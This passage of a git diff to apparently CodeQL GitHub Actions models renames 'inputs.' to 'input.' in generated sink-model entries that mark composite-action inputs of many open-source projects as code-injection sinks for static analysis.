["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index f1b5e6df222..c59e989db04 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml 
@@ -3,23 +3,23 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", 
"code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f952bd1da93..b426dfb250d 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 977662bfa65..4a0c3c2d30f 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 4c6c92fdefd..74d0ef69f75 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 45c2c1d780a..ac8762d24ea 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 1edfbfc9432..6df9a160ec5 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 658283336bd..0c2793028a0 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index d00b30874cc..f5bdc3d4bcc 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 94ece1a58a0..161022b8cbe 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 46d5a4383f4..391b1917029 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 5627a31bd90..3a45707d59e 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] - - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index 98d2d8bcbf7..c2e3608f745 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] - - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 57fb2e71064..9b8e9d1e7ed 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 8a216b97e1e..954f2c34661 100644 
--- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 735413808ec..31cb8acad9e 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 54334359d0e..4c8df154d8e 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 67826ea9c0f..8366d5119ae 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index d0540414702..a5d99cfc5e0 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 9020a979bbb..e07d26e6a5f 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 91c84fda1d1..3fe7b27d9d5 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 5031ff1e4ca..664c28bfc55 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index fc3a7ebe253..7b90ed20234 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index b7a664d512f..62b31c2d3ef 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index e86f7432a48..427b75730ab 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel 
diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 164ba02c42b..441913730fa 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 17fb61eeeb1..cbb2b43a2d8 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] - - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file 
